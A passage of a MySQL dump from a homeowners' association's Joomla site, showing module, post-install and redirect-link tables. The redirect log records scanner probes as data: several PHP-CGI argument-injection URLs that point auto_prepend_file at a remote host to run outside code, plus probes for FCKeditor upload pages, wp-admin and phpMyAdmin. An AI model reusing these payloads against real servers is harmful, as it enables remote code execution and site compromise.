00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'); /*!40000 ALTER TABLE `jos_modules` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_modules_menu` -- DROP TABLE IF EXISTS `jos_modules_menu`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_modules_menu` ( `moduleid` int(11) NOT NULL DEFAULT '0', `menuid` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`moduleid`,`menuid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_modules_menu` -- LOCK TABLES `jos_modules_menu` WRITE; /*!40000 ALTER TABLE `jos_modules_menu` DISABLE KEYS */; INSERT INTO `jos_modules_menu` VALUES (1,0),(2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(16,0),(17,0),(18,0),(20,0),(21,0),(22,0),(23,0),(24,101),(24,155),(24,160),(24,161),(24,162),(24,174),(24,175),(24,176),(24,177),(24,178),(25,101),(26,0),(27,0),(28,0),(29,0),(32,0),(33,0),(39,0),(40,0),(41,0),(42,181),(43,176),(44,179),(45,158),(46,160),(47,178),(48,177); /*!40000 ALTER TABLE `jos_modules_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_newsfeeds` -- DROP TABLE IF EXISTS `jos_newsfeeds`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_newsfeeds` ( `catid` int(11) NOT NULL DEFAULT '0', `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `link` varchar(200) NOT NULL DEFAULT '', `published` tinyint(1) NOT NULL DEFAULT '0', `numarticles` int(10) unsigned NOT NULL DEFAULT '1', `cache_time` int(10) unsigned NOT NULL DEFAULT '3600', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `ordering` int(11) NOT NULL DEFAULT '0', `rtl` tinyint(4) NOT NULL DEFAULT '0', `access` int(10) unsigned DEFAULT NULL, `language` char(7) NOT NULL DEFAULT '', `params` text NOT NULL, `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `description` text NOT NULL, `version` int(10) unsigned NOT NULL DEFAULT '1', `hits` int(10) unsigned NOT NULL DEFAULT '0', `images` text NOT NULL, PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`published`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_newsfeeds` -- LOCK TABLES `jos_newsfeeds` WRITE; /*!40000 ALTER TABLE `jos_newsfeeds` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_newsfeeds` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_overrider` -- DROP TABLE IF EXISTS `jos_overrider`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_overrider` ( `id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', `constant` varchar(255) NOT NULL, `string` text NOT NULL, `file` varchar(255) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_overrider` -- LOCK TABLES `jos_overrider` WRITE; /*!40000 ALTER TABLE `jos_overrider` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_overrider` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_postinstall_messages` -- DROP TABLE IF EXISTS `jos_postinstall_messages`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_postinstall_messages` ( `postinstall_message_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `extension_id` bigint(20) NOT NULL DEFAULT '700' COMMENT 'FK to #__extensions', `title_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for the title', `description_key` varchar(255) NOT NULL DEFAULT '' COMMENT 'Lang key for description', `action_key` varchar(255) NOT NULL DEFAULT '', `language_extension` varchar(255) NOT NULL DEFAULT 'com_postinstall' COMMENT 'Extension holding lang keys', `language_client_id` tinyint(3) NOT NULL DEFAULT '1', `type` varchar(10) NOT NULL DEFAULT 'link' COMMENT 'Message type - message, link, action', `action_file` varchar(255) DEFAULT '' COMMENT 'RAD URI to the PHP file containing action method', `action` varchar(255) DEFAULT '' COMMENT 'Action method name or URL', `condition_file` varchar(255) DEFAULT NULL COMMENT 'RAD URI to file holding display condition method', `condition_method` varchar(255) DEFAULT NULL COMMENT 'Display condition method, must return boolean', `version_introduced` varchar(50) NOT NULL DEFAULT '3.2.0' COMMENT 'Version when this message was introduced', `enabled` tinyint(3) NOT NULL DEFAULT '1', PRIMARY KEY (`postinstall_message_id`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_postinstall_messages` -- LOCK TABLES `jos_postinstall_messages` WRITE; /*!40000 ALTER TABLE `jos_postinstall_messages` DISABLE KEYS */; INSERT INTO `jos_postinstall_messages` VALUES (1,700,'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_TITLE','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_BODY','PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_ACTION','plg_twofactorauth_totp',1,'action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_action','site://plugins/twofactorauth/totp/postinstall/actions.php','twofactorauth_postinstall_condition','3.2.0',0),(2,700,'COM_CPANEL_MSG_EACCELERATOR_TITLE','COM_CPANEL_MSG_EACCELERATOR_BODY','COM_CPANEL_MSG_EACCELERATOR_BUTTON','com_cpanel',1,'action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_action','admin://components/com_admin/postinstall/eaccelerator.php','admin_postinstall_eaccelerator_condition','3.2.0',1),(3,700,'COM_CPANEL_MSG_PHPVERSION_TITLE','COM_CPANEL_MSG_PHPVERSION_BODY','','com_cpanel',1,'message','','','admin://components/com_admin/postinstall/phpversion.php','admin_postinstall_phpversion_condition','3.2.2',1); /*!40000 ALTER TABLE `jos_postinstall_messages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_redirect_links` -- DROP TABLE IF EXISTS `jos_redirect_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_redirect_links` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `old_url` varchar(255) DEFAULT NULL, `new_url` varchar(255) DEFAULT NULL, `referer` varchar(150) NOT NULL, `comment` varchar(255) NOT NULL, `hits` int(10) unsigned NOT NULL DEFAULT '0', `published` tinyint(4) NOT NULL, `created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`id`), UNIQUE KEY `idx_link_old` (`old_url`), KEY `idx_link_modifed` (`modified_date`) ) ENGINE=InnoDB AUTO_INCREMENT=14239 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_redirect_links` -- LOCK TABLES `jos_redirect_links` WRITE; /*!40000 ALTER TABLE `jos_redirect_links` DISABLE KEYS */; INSERT INTO `jos_redirect_links` VALUES (1,'http://nathanwoodbury.com/installation/index.php','','http://nathanwoodbury.com/installation/index.php','',0,0,'2011-09-29 09:23:40','0000-00-00 00:00:00'),(2,'http://renzymemije.com/hallcrest/installation/index.php','','http://renzymemije.com/hallcrest/installation/index.php','',8,0,'2013-05-17 13:59:10','0000-00-00 00:00:00'),(3,'http://0375e0c.netsolhost.com/site-map.html','','','',1,0,'2013-06-13 05:40:35','0000-00-00 00:00:00'),(4,'http://0375e0c.netsolhost.com/privacy-policy.html','','','',1,0,'2013-06-13 14:08:19','0000-00-00 00:00:00'),(5,'http://0375e0c.netsolhost.com/asdministrator','','','',1,0,'2013-07-10 00:42:03','0000-00-00 00:00:00'),(6,'http://0375e0c.netsolhost.com/contactus.html','','','',1,0,'2013-09-21 05:47:28','0000-00-00 00:00:00'),(7,'http://www.hallcrestheights.org/dues.html','','','',6,0,'2013-10-04 05:09:11','0000-00-00 00:00:00'),(8,'http://www.hallcrestheights.org/board.html','','http://www.hallcrestheights.org/board.html','',11,0,'2013-10-04 09:48:12','0000-00-00 00:00:00'),(9,'http://www.hallcrestheights.org/marketplace.html','','','',1,0,'2013-10-04 19:12:14','0000-00-00 00:00:00'),(10,'http://www.hallcrestheights.org/resident-s-directory.html','','','',1,0,'2013-10-04 20:54:43','0000-00-00 00:00:00'),(11,'http://www.hallcrestheights.org/residents.html','','','',1,0,'2013-10-04 22:24:09','0000-00-00 00:00:00'),(12,'http://www.hallcrestheights.org/word-of-mouth.html','','','',1,0,'2013-10-05 00:19:26','0000-00-00 00:00:00'),(13,'http://www.hallcrestheights.org/announcement.html','','','',1,0,'2013-10-07 23:23:42','0000-00-00 00:00:00'),(14,'http://hallcrestheights.org/board.html','','http://hallcrestheights.org/board.html','',18,0,'2013-10-09 07:06:51','0000-00-00 00:00:00'),(15,'http://www.hallcrestheights.org/design.html','','','',10,0,'2013-10-10 03:32:16','0000-00-00 00:00:00'),(16,'http://www.hallcrestheights.org/resident-forum.html','','','',1,0,'2013-10-10 03:42:47','0000-00-00 00:00:00'),(17,'http://www.hallcrestheights.org/privacy-policy.html/trackback/','','http://www.hallcrestheights.org/privacy-policy.html','',2,0,'2013-10-11 05:40:06','0000-00-00 00:00:00'),(18,'http://www.hallcrestheights.org/summary.html','','','',11,0,'2013-10-14 16:08:46','0000-00-00 00:00:00'),(19,'http://hallcrestheights.org/HOA/index.html?cid=hallcrestheights&menu=20100721052247-1376-2094435350-6531702','','','',2,0,'2013-10-15 04:09:28','0000-00-00 00:00:00'),(20,'http://www.hallcrestheights.org/quality.html','','','',9,0,'2013-10-15 16:00:54','0000-00-00 00:00:00'),(21,'http://www.hallcrestheights.org/around.html','','','',11,0,'2013-10-16 19:20:31','0000-00-00 00:00:00'),(22,'http://www.hallcrestheights.org/association/privacy-policy.html','','','',1,0,'2013-10-17 22:22:17','0000-00-00 00:00:00'),(23,'http://www.hallcrestheights.org/community/privacy-policy.html','','','',1,0,'2013-10-17 22:25:05','0000-00-00 00:00:00'),(24,'http://www.hallcrestheights.org/events/privacy-policy.html','','','',1,0,'2013-10-17 22:25:16','0000-00-00 00:00:00'),(25,'http://hallcrestheights.org/dues.html','','','',7,0,'2013-10-22 11:55:29','0000-00-00 00:00:00'),(26,'http://hallcrestheights.org/design.html','','','',4,0,'2013-10-28 04:58:33','0000-00-00 00:00:00'),(27,'http://hallcrestheights.org/title.html','','','',1,0,'2013-10-28 21:33:47','0000-00-00 00:00:00'),(28,'http://hallcrestheights.org/wordpress','','http://hallcrestheights.org/wordpress','',1,0,'2013-11-01 16:47:22','0000-00-00 00:00:00'),(29,'http://hallcrestheights.org/summary.html','','','',7,0,'2013-11-01 19:38:28','0000-00-00 00:00:00'),(30,'http://hallcrestheights.org/around.html','','','',7,0,'2013-11-03 07:51:44','0000-00-00 00:00:00'),(31,'http://hallcrestheights.org/HOA/index.html?cid=hallcrestheights&menu=20100721052233-980-6890250377-30022346','','','',3,0,'2013-11-06 03:01:04','0000-00-00 00:00:00'),(32,'http://hallcrestheights.org/blog','','http://hallcrestheights.org/blog','',2,0,'2013-11-09 20:48:10','0000-00-00 00:00:00'),(33,'http://hallcrestheights.org/wp','','http://hallcrestheights.org/wp','',1,0,'2013-11-13 16:34:04','0000-00-00 00:00:00'),(34,'http://hallcrestheights.org/blogs','','http://hallcrestheights.org/blogs','',1,0,'2013-11-17 21:18:07','0000-00-00 00:00:00'),(35,'http://www.hallcrestheights.org/member/register','','http://www.hallcrestheights.org/','',1,0,'2013-11-20 06:57:46','0000-00-00 00:00:00'),(36,'http://www.hallcrestheights.org/index.php/forums/member/register','','http://www.hallcrestheights.org/','',1,0,'2013-11-20 06:57:47','0000-00-00 00:00:00'),(37,'http://www.hallcrestheights.org/forum/member/register','','http://www.hallcrestheights.org/','',1,0,'2013-11-20 06:57:47','0000-00-00 00:00:00'),(38,'http://hallcrestheights.org/quality.html','','','',5,0,'2013-11-24 12:58:17','0000-00-00 00:00:00'),(39,'http://www.hallcrestheights.org/%E2%80%8E','','','',1,0,'2013-11-25 19:47:29','0000-00-00 00:00:00'),(40,'http://hallcrestheights.org/HOA/index.html?cid=hallcrestheights&menu=20100721052259-1730-542730112-28761613','','','',3,0,'2013-11-28 09:54:58','0000-00-00 00:00:00'),(41,'http://hallcrestheights.org/admin','','','',22,0,'2013-11-30 15:42:27','0000-00-00 00:00:00'),(42,'http://hallcrestheights.org/HOA/index.html?cid=hallcrestheights&menu=20110702120005-595-2641209693-6120731','','','',3,0,'2013-12-08 16:04:27','0000-00-00 00:00:00'),(43,'http://hallcrestheights.org/user','','','',7,0,'2013-12-13 00:54:39','0000-00-00 00:00:00'),(44,'http://hallcrestheights.org/admin/index.php?route=common/login','','','',1,0,'2013-12-13 00:55:06','0000-00-00 00:00:00'),(45,'http://hallcrestheights.org/index.php/admin/','','','',2,0,'2013-12-13 00:54:47','0000-00-00 00:00:00'),(46,'http://hallcrestheights.org/bitrix/admin/','','','',2,0,'2013-12-13 00:54:48','0000-00-00 00:00:00'),(47,'http://HALLCRESTHEIGHTS.ORG/wp-admin/','','','',2,0,'2013-12-18 03:11:23','0000-00-00 00:00:00'),(48,'http://HALLCRESTHEIGHTS.ORG/wordpress/wp-admin/','','','',2,0,'2013-12-18 03:11:34','0000-00-00 00:00:00'),(49,'http://HALLCRESTHEIGHTS.ORG/blog/wp-admin/','','','',2,0,'2013-12-18 03:11:36','0000-00-00 00:00:00'),(50,'http://www.hallcrestheights.org/news1.html','','','',3,0,'2013-12-18 16:47:30','0000-00-00 00:00:00'),(51,'http://hallcrestheights.org/wp/wp-admin/','','','',3,0,'2013-12-22 12:16:45','0000-00-00 00:00:00'),(52,'http://hallcrestheights.org/HOA/index.html?cid=hallcrestheights&menu=20100721052259-1708-8990392134-28270942','','','',2,0,'2013-12-26 23:17:34','0000-00-00 00:00:00'),(53,'http://hallcrestheights.org/HOA/index.html?cid=hallcrestheights&menu=20100721052251-1476-5651058207-23915073','','','',2,0,'2013-12-28 13:16:11','0000-00-00 00:00:00'),(54,'http://hallcrestheights.org/blog/','','','',52,0,'2013-12-31 07:29:01','0000-00-00 00:00:00'),(55,'http://hallcrestheights.org/wp-login.phpindex.php','','hallcrestheights.org/wp-login.phpindex.php','',1,0,'2014-01-05 11:40:36','0000-00-00 00:00:00'),(56,'http://hallcrestheights.org/cahce/index.html','','','',1,0,'2014-01-05 19:33:12','0000-00-00 00:00:00'),(57,'http://hallcrestheights.org/HOA/index.html?cid=hallcrestheights&menu=20100721052236-1068-2973091248-13104928','','','',2,0,'2014-01-07 15:15:56','0000-00-00 00:00:00'),(58,'http://hallcrestheights.org/HOA/index.html?cid=hallcrestheights&menu=20100721052238-1140-1927274225-33434212','','','',2,0,'2014-01-12 14:14:48','0000-00-00 00:00:00'),(59,'http://hallcrestheights.org/pma/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F75.99.7.131%2Fchanglog.txt','','','',1,0,'2014-01-19 23:35:14','0000-00-00 00:00:00'),(60,'http://hallcrestheights.org/phpmyadmin/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F75.99.7.131%2Fchanglog.txt','','','',1,0,'2014-01-19 23:35:32','0000-00-00 00:00:00'),(61,'http://hallcrestheights.org/admin/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F75.99.7.131%2Fchanglog.txt','','','',1,0,'2014-01-19 23:35:52','0000-00-00 00:00:00'),(62,'http://hallcrestheights.org/login/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F75.99.7.131%2Fchanglog.txt','','','',1,0,'2014-01-19 23:36:11','0000-00-00 00:00:00'),(63,'http://hallcrestheights.org/forum/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F75.99.7.131%2Fchanglog.txt','','','',1,0,'2014-01-19 23:36:30','0000-00-00 00:00:00'),(64,'http://hallcrestheights.org/webmail/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F75.99.7.131%2Fchanglog.txt','','','',1,0,'2014-01-19 23:39:04','0000-00-00 00:00:00'),(65,'http://hallcrestheights.org/mail/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F75.99.7.131%2Fchanglog.txt','','','',1,0,'2014-01-19 23:38:24','0000-00-00 00:00:00'),(66,'http://hallcrestheights.org/component/content/article.html?id=article','','','',1,0,'2014-01-23 01:15:07','0000-00-00 00:00:00'),(67,'http://www.hallcrestheights.org/index.html','','','',1,0,'2014-02-01 15:47:04','0000-00-00 00:00:00'),(68,'http://hallcrestheights.org/components/com_jmultimedia/assets/thumbs/phpthumb/fonts/index.html','','','',1,0,'2014-02-06 00:05:11','0000-00-00 00:00:00'),(69,'http://hallcrestheights.org/components/com_flexicontent/librairies/phpthumb/fonts/index.html','','','',1,0,'2014-02-06 00:05:13','0000-00-00 00:00:00'),(70,'http://hallcrestheights.org/components/com_hotornot2/phpthumb/fonts/index.html','','','',1,0,'2014-02-06 00:05:14','0000-00-00 00:00:00'),(71,'http://hallcrestheights.org/components/com_portfolio/includes/phpthumb/fonts/index.html','','','',1,0,'2014-02-06 00:05:16','0000-00-00 00:00:00'),(72,'http://hallcrestheights.org/components/com_alphauserpoints/assets/phpthumb/fonts/index.html','','','',1,0,'2014-02-06 00:05:17','0000-00-00 00:00:00'),(73,'http://hallcrestheights.org/components/com_community/index.html','','','',1,0,'2014-02-06 13:40:31','0000-00-00 00:00:00'),(74,'http://hallcrestheights.org/phpmyadmin/README','','http://www.baidu.com','',1,0,'2014-02-08 08:09:33','0000-00-00 00:00:00'),(75,'http://hallcrestheights.org/index.php/i','','http://www.baidu.com','',1,0,'2014-02-08 08:09:36','0000-00-00 00:00:00'),(76,'http://hallcrestheights.org/phpmyadmin/ChangeLog','','http://www.baidu.com','',1,0,'2014-02-08 08:09:49','0000-00-00 00:00:00'),(77,'http://hallcrestheights.org/README','','http://www.baidu.com','',1,0,'2014-02-08 08:09:52','0000-00-00 00:00:00'),(78,'http://hallcrestheights.org/ChangeLog','','http://www.baidu.com','',1,0,'2014-02-08 08:10:45','0000-00-00 00:00:00'),(79,'http://www.hallcrestheights.org/files/hoa','','','',1,0,'2014-02-15 15:13:31','0000-00-00 00:00:00'),(80,'http://www.hallcrestheights.org/media/system/js/);if(!b){b=new','','','',1,0,'2014-02-19 21:20:06','0000-00-00 00:00:00'),(81,'http://www.hallcrestheights.org/media/system/js/,i)}var','','','',1,0,'2014-02-19 21:19:43','0000-00-00 00:00:00'),(82,'http://www.hallcrestheights.org/media/jui/js/)[this.options.html','','','',1,0,'2014-02-19 21:20:12','0000-00-00 00:00:00'),(83,'http://hallcrestheights.org//FCKedItor/editor/filemanager/connectors/uploadtest.html','','http://hallcrestheights.org//FCKedItor/editor/filemanager/connectors/uploadtest.html','',1,0,'2014-02-24 03:37:27','0000-00-00 00:00:00'),(84,'http://www.hallcrestheights.org/association/about-us.html%20/%20/','','','',1,0,'2014-03-02 09:15:34','0000-00-00 00:00:00'),(85,'http://www.hallcrestheights.org/%20/','','','',1,0,'2014-03-02 09:15:36','0000-00-00 00:00:00'),(86,'http://www.hallcrestheights.org/community/neighborhood-guide.html%20/%20/','','','',1,0,'2014-03-02 09:16:16','0000-00-00 00:00:00'),(87,'http://www.hallcrestheights.org/community/announcements.html%20/%20/','','','',1,0,'2014-03-02 09:16:17','0000-00-00 00:00:00'),(88,'http://www.hallcrestheights.org/community/events.html%20/%20/','','','',1,0,'2014-03-02 09:16:19','0000-00-00 00:00:00'),(89,'http://www.hallcrestheights.org/community/real-estate-guide.html%20/%20/','','','',1,0,'2014-03-02 09:16:20','0000-00-00 00:00:00'),(90,'http://www.hallcrestheights.org/association/board-members.html%20/%20/','','','',1,0,'2014-03-02 09:16:22','0000-00-00 00:00:00'),(91,'http://www.hallcrestheights.org/association/newsletters.html%20/%20/','','','',1,0,'2014-03-02 09:16:23','0000-00-00 00:00:00'),(92,'http://www.hallcrestheights.org/interests.html%20/%20/','','','',1,0,'2014-03-02 09:16:24','0000-00-00 00:00:00'),(93,'http://www.hallcrestheights.org/announcements.html%20/%20/','','','',1,0,'2014-03-02 09:16:32','0000-00-00 00:00:00'),(94,'http://www.hallcrestheights.org/site-map.html%20/%20/','','','',1,0,'2014-03-02 09:16:33','0000-00-00 00:00:00'),(95,'http://www.hallcrestheights.org/interests/16-how-to-avoid-special-assessments.html%20/%20/','','','',1,0,'2014-03-02 09:16:41','0000-00-00 00:00:00'),(96,'http://www.hallcrestheights.org/interests/15-the-hallcrest-annual-meeting.html%20/%20/','','','',1,0,'2014-03-02 09:16:43','0000-00-00 00:00:00'),(97,'http://www.hallcrestheights.org/interests/12-go-green.html%20/%20/','','','',1,0,'2014-03-02 09:16:44','0000-00-00 00:00:00'),(98,'http://www.hallcrestheights.org/interests/11-energy-tips.html%20/%20/','','','',1,0,'2014-03-02 09:16:46','0000-00-00 00:00:00'),(99,'http://www.hallcrestheights.org/community.html%20/%20/','','','',1,0,'2014-03-02 09:16:47','0000-00-00 00:00:00'),(100,'http://www.hallcrestheights.org/association.html%20/%20/','','','',1,0,'2014-03-02 09:16:52','0000-00-00 00:00:00'),(101,'http://hallcrestheights.org/community/real-estate-guide.html/RK=0/RS=k0ImoHbNkAVmueqFtvO5AnMNCxs-','','http://hallcrestheights.org/','',1,0,'2014-03-11 04:23:06','0000-00-00 00:00:00'),(102,'http://www.hallcrestheights.org/index2.html','','','',1,0,'2014-03-15 02:46:55','0000-00-00 00:00:00'),(103,'http://hallcrestheights.org//RS=^ADAa8gIREeN92ETPQLWGfag3DOyap4-','','http://hallcrestheights.org/','',1,0,'2014-03-16 01:36:19','0000-00-00 00:00:00'),(104,'http://www.hallcrestheights.org/association/sign_up.html','','http://www.hallcrestheights.org/association/','',1,0,'2014-03-18 08:15:04','0000-00-00 00:00:00'),(105,'http://www.hallcrestheights.org/association/index.php?page=en_Signup','','','',1,0,'2014-03-18 08:15:22','0000-00-00 00:00:00'),(106,'http://www.hallcrestheights.org/association/index.php?do=/user/register/','','http://www.hallcrestheights.org/association/','',1,0,'2014-03-18 08:15:28','0000-00-00 00:00:00'),(107,'http://www.hallcrestheights.org/association/signup','','http://www.hallcrestheights.org/association/','',1,0,'2014-03-18 08:16:33','0000-00-00 00:00:00'),(108,'http://hallcrestheights.org/modules/mod_index/mod_index.php','','','',1,0,'2014-03-31 03:44:36','0000-00-00 00:00:00'),(109,'http://hallcrestheights.org/components/com_jvideodirect/tools/uploader/php/index.php','','','',1,0,'2014-04-02 04:23:51','0000-00-00 00:00:00'),(110,'http://hallcrestheights.org/plugins/content/index.php','','','',1,0,'2014-04-13 03:25:20','0000-00-00 00:00:00'),(111,'http://www.hallcrestheights.org/fckeditor/editor/filemanager/browser/default/connectors/test.html','','http://www.hallcrestheights.org/fckeditor/editor/filemanager/browser/default/connectors/test.html','',1,0,'2014-04-15 23:20:35','0000-00-00 00:00:00'),(112,'http://www.hallcrestheights.org/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html','','http://www.hallcrestheights.org/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html','',1,0,'2014-04-15 23:20:37','0000-00-00 00:00:00'),(113,'http://www.hallcrestheights.org/editor/filemanager/browser/default/connectors/test.html','','http://www.hallcrestheights.org/editor/filemanager/browser/default/connectors/test.html','',1,0,'2014-04-15 23:20:40','0000-00-00 00:00:00'),(114,'http://www.hallcrestheights.org/admin/fckeditor/editor/filemanager/upload/test.html','','http://www.hallcrestheights.org/admin/fckeditor/editor/filemanager/upload/test.html','',1,0,'2014-04-15 23:20:42','0000-00-00 00:00:00'),(115,'http://www.hallcrestheights.org/admin/fckeditor/editor/filemanager/connectors/test.html','','http://www.hallcrestheights.org/admin/fckeditor/editor/filemanager/connectors/test.html','',1,0,'2014-04-15 23:20:44','0000-00-00 00:00:00'),(116,'http://hallcrestheights.org/forum/','','http://hallcrestheights.org/forum/','',1,0,'2014-04-28 07:59:00','0000-00-00 00:00:00'),(117,'http://hallcrestheights.org/wp-content/plugins/category-grid-view-gallery/','','','',1,0,'2014-05-02 06:44:41','0000-00-00 00:00:00'),(118,'http://www.hallcrestheights.org/files/index.php?site=guestbook&action=add','','http://www.hallcrestheights.org/files/HOA_Newsletters_June_2013.pdf/','',1,0,'2014-05-03 09:13:51','0000-00-00 00:00:00'),(119,'http://HALLCRESTHEIGHTS.ORG//admin/','','','',1,0,'2014-05-09 03:27:43','0000-00-00 00:00:00'),(120,'http://HALLCRESTHEIGHTS.ORG//forum/admin/','','','',1,0,'2014-05-09 03:27:45','0000-00-00 00:00:00'),(121,'http://hallcrestheights.org/old/wp-admin/','','','',3,0,'2014-05-16 23:50:22','0000-00-00 00:00:00'),(122,'http://hallcrestheights.org/plugins/search/index.php','','','',3,0,'2014-05-17 02:27:26','0000-00-00 00:00:00'),(123,'http://hallcrestheights.org/components/com_search/views/search/index.php','','','',6,0,'2014-05-17 02:27:26','0000-00-00 00:00:00'),(124,'http://hallcrestheights.org/components/com_user/views/index.php','','','',2,0,'2014-05-17 02:27:26','0000-00-00 00:00:00'),(125,'http://hallcrestheights.org/components/com_contact/index.php','','','',3,0,'2014-05-18 04:11:18','0000-00-00 00:00:00'),(126,'http://hallcrestheights.org/components/com_ag_google_analytics2/index.php','','http://hallcrestheights.org/components/com_ag_google_analytics2/index.php','',1,0,'2014-05-19 10:50:32','0000-00-00 00:00:00'),(127,'http://hallcrestheights.org/components/com_weblinks/index.php','','','',3,0,'2014-05-23 06:07:51','0000-00-00 00:00:00'),(128,'http://hallcrestheights.org/templates/beez/index.php','','','',19,0,'2014-05-24 06:23:16','0000-00-00 00:00:00'),(129,'http://hallcrestheights.org/components/com_jce/media/js/index.php','','','',1,0,'2014-05-27 05:40:36','0000-00-00 00:00:00'),(130,'http://www.hallcrestheights.orghttp//www.hallcrestheights.org/association/board-members.html','','http://www.hallcrestheights.org/association/board-members.html','',1,0,'2014-06-02 16:25:41','0000-00-00 00:00:00'),(131,'http://www.hallcrestheights.orghttp//www.hallcrestheights.org//www.hallcrestheights.org/association/board-members.html','','http://www.hallcrestheights.org//www.hallcrestheights.org/association/board-members.html','',1,0,'2014-06-02 16:25:48','0000-00-00 00:00:00'),(132,'http://www.hallcrestheights.org/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2014-06-03 07:08:28','0000-00-00 00:00:00'),(133,'http://www.hallcrestheights.org/editor/editor/filemanager/upload/test.html','','','',1,0,'2014-06-03 07:35:24','0000-00-00 00:00:00'),(134,'http://www.hallcrestheights.org/js/fckeditor/editor/filemanager/browser/default/browser.html','','','',1,0,'2014-06-03 07:47:41','0000-00-00 00:00:00'),(135,'http://www.hallcrestheights.org/public/js/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2014-06-03 07:49:17','0000-00-00 00:00:00'),(136,'http://www.hallcrestheights.org/fckeditor/editor/fckeditor.html','','','',1,0,'2014-06-03 08:36:25','0000-00-00 00:00:00'),(137,'http://www.hallcrestheights.org/cms/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2014-06-03 12:13:51','0000-00-00 00:00:00'),(138,'http://www.hallcrestheights.org/js/fckeditor/editor/filemanager/upload/test.html','','','',1,0,'2014-06-03 15:19:04','0000-00-00 